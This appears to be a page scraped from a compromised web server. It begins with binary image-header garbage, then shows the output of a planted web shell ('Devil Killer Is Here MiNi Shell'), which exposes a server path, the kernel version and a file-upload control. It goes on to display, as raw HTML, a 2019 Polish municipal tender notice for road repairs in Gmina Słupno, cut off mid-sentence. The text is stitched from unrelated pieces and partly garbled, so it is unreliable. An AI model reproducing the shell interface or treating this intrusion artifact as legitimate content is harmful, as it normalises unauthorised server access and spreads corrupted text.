JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190429/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190429/542846-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 542846-N-2019 z dnia 2019-04-29 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Gmina Słupno</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Prace remontowe w zakresie dróg na terenie Gminy Słupno w 2019r.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Gmina Słupno</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">61101599700000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Miszewska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu"></span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">09-472</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Słupno</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">024 2679560, 2679584</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">ug@slupno.eu</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">242 612 977</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.ugslupno.bip.org.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Administracja samorządowa</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.ugslupno.bip.org.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.ugslupno.bip.org.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Urząd Gminy w Słupnie, ul. Miszewska 8a, 09-472 Słupno, pok. nr 13 (sekretariat)</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Prace remontowe w zakresie dróg na terenie Gminy Słupno w 2019r.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">SZP.271.1.7.2019 </span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest realizacja zadania pn:,,Prace remontowe w zakresie dróg na terenie Gminy Słupno w 2019r.". Zamówienie obejmuje cztery części:- Część 1 - Utwardzenie nawierzchni dróg gruzem betonowym. Zakres prac obejmuje - Tyczenie geodezyjne osi drogi - Mechaniczne wykonanie koryta dla średniej głębokości 25cm (jeżeli będzie zachodziła konieczność),- Ułożenia warstwy piasku o grubości co najmniej 25 cm po zagęszczeniu (jeżeli będzie zachodziła konieczność),- Transport materiału z wykopu na odległość do 5km,- Zagęszczenie oraz profilowanie koryta,- Ułożenie warstwy gruzu betonowego - grubości 15cm po zagęszczeniu,- Mechaniczne zagęszczenie ułożonej warstwy kruszywa,- Regulacja wysokościowa studni i zasuw.Wymagania sprzętowe- Koparka lub koparko ładowarka z łyżką umożliwiającą wykonanie koryta,- Samochód lub samochody samowyładowcze,- Walec stalowy lub gumowo stalowy, - Zagęszczarka typ ciężki. Wymagania materiałowePiasek lub pospółka o różnoziarnistości co najmniej 3. Gruz betonowy frakcji 0/63 posiadające dokument potwierdzający dopuszczenie do stosowania w budownictwie Opis robótZakres robót obejmuje tyczenie osi drogi przez uprawnionego geodetę. Nie wymagana jest inwentaryzacja geodezyjna oraz wykonanie map inwentaryzacyjnych. Mechaniczne wykonanie koryta na średnią głębokość 25cm wraz z odwiezieniem urobku do 5km. Zamawiający zastrzega sobie prawo do dysponowania całością lub częścią urobku z wykopu i wskazania miejsca jego składowania. Część nie zadysponowaną przez Zamawiającego ma obowiązek zadysponować wykonawca bez prawa do dodatkowego wynagrodzenia. Ręczne profilowanie dna koryta oraz zagęszczenie przy pomocy zagęszczarek lub walca. Zamawiający ma prawo do wskazania miejsc, w których ma być wykonany pomiar stopnia zagęszczenia oraz wykonane dogęszczenie dna koryta. Ułożenie dolnej warstwy piasku o grubości co najmniej 25cm po zagęszczeniu. Warstwa górna o grubości co najmniej 15 cm, powinna być wykonane z gruzu betonowego frakcji 0/63 dopuszczonego do stosowania w budownictwie.Każda z warstw powinna być oddzielnie wyprofilowana oraz zagęszczona.Warstwy można układać mechanicznie, przy pomocy rozkładarki do kruszywa, koparek, ładowarek lub ręczne. Ułożona warstwa powinna być odpowiednio wyprofilowana oraz jednorodna.Zagęszczenie warstw należy wykonać przy pomocy walca lub zagęszczarki typu ciężkiego. Inwestor ma prawo do wskazania miejsc, w których ma być wykonany pomiar stopnia zagęszczenia ułożonych warstw oraz wykonane dogęszczenie.Uporządkowanie terenu budowy.Wykonawca powinien dysponować sprzętem o parametrach oraz gruzem betonowym w ilości aby mógł zrealizować min. 300m2 drogi dziennie w technologii przewidzianej dla powyższego zakresu.Zakres robótZakres robót obejmuje utwardzenie nawierzchni drogi gruzem betonowym w okresie od daty podpisania umowy do 15.09.2019r. Zamawiający przewiduje następujące ulice na terenie gminy do utwardzenia gruzem betonowym:Cekanowo - 1 000m2:o	ul. Rumiankowa - sięgacz (z korytowaniem) - 50m długości i 4m szerokości,o	ul. Stokrotki(z korytowaniem) - 200m długości i 4m szerokości.Stare Gulczewo - 640m2:o	droga na działce nr 28/1 (z korytowaniem) - 160m długości i 4m szerokości.Słupno - 5 090m2:o	ulica Calineczki (bez korytowania) - 660m długości i 4 m szerokości,o	droga nr 291212W (bez korytowania) - 550m długości i 3 m szerokości,o	ulica Młynarska (bez korytowania) - 200m długości i 4m szerokości.W sumie jest do wykonania 1 640m2 nawierzchni drogi z gruzu betonowego z korytowaniem i warstwą piasku oraz 5 090m2 nawierzchni drogi tylko z samego gruzu betonowego.Rozliczenie robótRozliczenie robót nastąpi po dokonaniu obmiaru wykonanych robót w m2 potwierdzonych przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. - CZĘŚĆ 2 - Wykonanie nawierzchni dróg z kruszywa bitumiczno - kamiennego (destrukt).	Zakres prac obejmuje- Tyczenie geodezyjne osi drogi - Mechaniczne profilowanie istniejącej korony drogi- Zagęszczenie istniejącej korony drogi- Regulacja wysokościowa studni i zasuw- Ułożenie warstwy kruszywa bitumiczno-kamiennego - grubości co najmniej 9cm po zagęszczeniu- Mechaniczne zagęszczenie ułożonej warstwy kruszywa bitumiczno-kamiennego (walec, zagęszczarka).Wymagania sprzętowe- Rozściełacz lub koparka/koparko ładowarka z łyżką umożliwiającą wykonanie koryta- Samochód lub samochody samowyładowcze- Walec stalowy lub gumowo stalowy - Zagęszczarka typ ciężki Wymagania materiałoweKruszywo bitumiczno-kamienne pochodzące z frezowania istniejących nawierzchni bitumicznych nie powinno zawierać domieszek betonu, oraz innych materiałów. Wielkość ziaren kruszywa powinna gwarantować odpowiednie zagęszczenie ułożonej warstwy, średnica nie powinna być większa niż 25mm.Wykonawca przed rozpoczęciem układania zobowiązany jest do uzyskania akceptacji kruszywa z którego wykonywany będzie zlecony zakres drogi u inspektora nadzoru.Wykonawca powinien dysponować sprzętem o parametrach, oraz kruszywem ilości aby mógł zrealizować min. 300m2 drogi dziennie w technologii przewidzianej dla powyższego zakresu.Czas na realizację - do 15 września 2019r.Opis robótZakres robót obejmuje tyczenie osi drogi przez uprawnionego geodetę. Nie wymagana jest inwentaryzacja geodezyjna oraz wykonanie map inwentaryzacyjnych. Mechaniczne profilowanie istniejącej korony drogi przy pomocy równiarki, koparko-ładowarki lub koparki oraz zagęszczenie przy pomocy walca lub zagęszczarki typ ciężki. Wykonanie niezbędnych robót przygotowawczych - regulacja wysokościowa studni i zasuw. Ułożenie warstwy kruszywa bitumiczno-kamiennego - grubości co najmniej 9cm po zagęszczeniu i szerokości 4m. Dodatkowo należy wykonać 1,5m zjazdy do każdej posesji i każdej krzyżującej się drogi.Kruszywo bitumiczno-kamienne pochodzące z frezowania istniejących nawierzchni bitumicznych nie powinno zawierać domieszek betonu, oraz innych materiałów. Wielkość ziaren kruszywa powinna gwarantować odpowiednie zagęszczenie ułożonej warstwy, średnica nie powinna być większa niż 25mm.Każda partia materiału musi być dopuszczona do wbudowania przez inspektora nadzoru lub upoważnionego pracownika Urzędu Gminy. Kruszywo można układać mechanicznie, przy pomocy rozściełacza, koparek, ładowarek lub ręcznie. Ułożona warstwa powinna być odpowiednio wyprofilowana oraz jednorodna.Zagęszczenie warstw należy wykonać przy pomocy walca lub zagęszczarki typ ciężki. Wykonawca powinien dysponować sprzętem o parametrach, oraz kruszywem w ilości aby mógł zrealizować min. 300m2 drogi dziennie w technologii przewidzianej dla powyższego zakresuZakres robótZakres robót obejmuje utrzymanie dróg w okresie od daty podpisania umowy do 15.09.2019r. Zamawiający przewiduje następujące ulice na terenie gminy do utwardzenia kruszywem bitumiczno-kamiennym:Nowe Gulczewo - 1145mb:o	ul. Podbipęnty - 570m długości i 4m szerokości,o	ul. Sarmacka - 290m długości i 4m szerokości,o	ul. Husarska - 130m długości i 4m szerokości,o	ul. Przesmyk - 95m długości i 4m szerokości,o	ul. Szlachecka - 60m długości i 4m szerokości.Słupno - 785mb:o	ul. Do Grodziska - 125m długości i 4m szerokości,o	ul. Cedrowa - 300m długości i 4m szerokości,o	ul. Wiosenna - 50m długości i 4m szerokościo	ul. Młynarska - 310m długości i 5m szerokości.Cekanowo - 250mb:o	ul. Rumiankowa - 250m długości i 4m szerokości.Wykowo - 300mb:o	Uliczki - 300m długości i 4m szerokości.Liszyno - 330mb:o	Pogodna - 260m długości i 4m szerokości,o	Migdałowa - 70m długości i 4m szerokości.Borowiczki Pieńki - 390mb:o	Liściasta - 140m długości i 4m szerokości,o	Kupiecka - 80m długości i 4m szerokości,o	Boczna - 170m długości i 4m szerokości.Co stanowi 13 110m2, do tego doliczane jest 10% na wykonanie dojazdów z remontowanych ulic do posesjami znajdującymi się przy niej.W sumie jest do wykonania 14 421m2 nawierzchni drogi z kruszywa bitumiczno-kamiennego (destrukt)Rozliczenie robótRozliczenie nastąpi po wykonaniu robót i odbiorze potwierdzonym przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. - CZĘŚĆ 3 - Wyrównanie dróg gruntowych oraz częściowo utwardzonych równiarką wraz z zagęszczeniem walcem. Zakres prac obejmuje- wyrównanie istniejącej nawierzchni drogi gruntowej lub częściowo utwardzonej przy pomocy równiarki,- zagęszczenie walcem.Wymagania sprzętowe- równiarka - walecWymagania materiałoweBRAKCzas na realizację- do 30.06.2019r.Opis robótRoboty obejmują wyrównanie istniejącej nawierzchni drogi gruntowej lub częściowo utwardzonej przy pomocy równiarki z nadaniem spadku poprzecznego i podłużnego oraz zagęszczenie przy pomocy walca. Należy zwrócić szczególną uwagę na studnie kanalizacji sanitarnej jak również zasuwy znajdujące się w drodze.Zakres robótZakres robót obejmuje utrzymanie dróg w okresie od daty podpisania umowy do 30.06.2019r. Zamawiający przewiduje następujące ulice i drogi na terenie gminy do wyrównania:Liszyno - 1 080m2:o	Pogodna - 270m długości i 4 m szerokości,Stare Gulczewo/Mirosław - 7 700m2:o	,,Trakt" - 2200m długości i 3,5 m szerokości,Słupno - 3 255m2:o	Wiosenna - 930m długości i 3,5 m szerokości,Barcikowo - 2 100m2:o	Droga na działce nr 79 - 600m długości i 3,5 m szerokości,Wykowo - 10 380m2:o	Droga na działce nr 39/1 - 950m długości i 3 m szerokości,2850o	Droga na działce nr 103/2 - 950m długości i 3,5 m szerokości,3325o	Droga na działce nr 103/2 - 950m długości i 3,5 m szerokości,3325o	Droga ,,do wału" - 220m długości i 4 m szerokości,880Mirosław - 1 750m2:o	Droga na granicy - 500m długości i 3,5 m szerokości,Co stanowi 24 375 m2 dróg i ulic przeznaczonych do utwardzenia na terenie Gminy Słupno. Rozliczenie robótRozliczenie robót nastąpi po dokonaniu obmiaru wykonanych robót w m2 potwierdzonych przez inspektora nadzoru lub uprawnionego pracownika Urzędu Gminy protokołem odbioru. Prawidłowo wypełniony protokół odbioru stanowi podstawę do wystawienia faktury. Zamawiający przewiduje rozliczenie na podstawie protokołów i faktur składanych nie częściej niż jeden raz w miesiącu. - CZĘŚĆ 4 - Naprawa ubytków w nawierzchni bitumicznej.Zakres prac obejmuje- cięcie piłą nawierzchni bitumicznej na średnią głębokość 6 cm- uzupełnienie istniejącej podbudowy średnio grubości 10cm,- skropienie podbudowy emulsją asfaltową,- ułożenie warstwy asfaltu na średnią grubości 4cm,- zagęszczenie,- uszczelnienie połączenia emulsją asfaltową oraz grysem. Wymagania sprzętowe- Samochód dostawczy lub ciężarowy,- Urządzenie do przerobu zerwanego asfaltu,- Walec, - Zagęszczarka,- Piła do ciecia asfaltu.Wymagania materiałowe- Masa bitumiczna z odzysku umożliwiająca przerobienie jej oraz wbudowanie,- Emulsja asfaltowa,- Grys bazaltowy frakcji 2/5,- Kruszywo kamienne(mieszanka optymalna) frakcji 0/31,5.Zamawiający dopuszcza stosowanie mieszanki mineralno-asfaltowej produkowanej w otaczarce i dowożonej samochodem samowyładowczym na miejsce wbudowania. Parametry mieszanki produkowanej w otaczarce powinny być dostosowane dla kategorii ruchu KR3. Wykonawca na żądanie Zamawiającego przedłoży dla danej partii potwierdzone za zgodność z oryginałem recepty, atesty na materiały oraz wyniki badań mieszanki mineralno-asfaltowej produkowanej w otaczarceWykonawca po rozgrzaniu a przed rozpoczęciem układania mieszanki mineralno-asfaltowej wytwarzanej w urządzeniu do przerobu zerwanego asfaltu zobowiązany jest do uzyskania jej akceptacji u inspektora nadzoru.Wykonawca powinien dysponować sprzętem o parametrach, oraz mieszanką mineralno-asfaltową w ilości aby mógł wytworzyć i wbudować min. 3 tony mieszanki 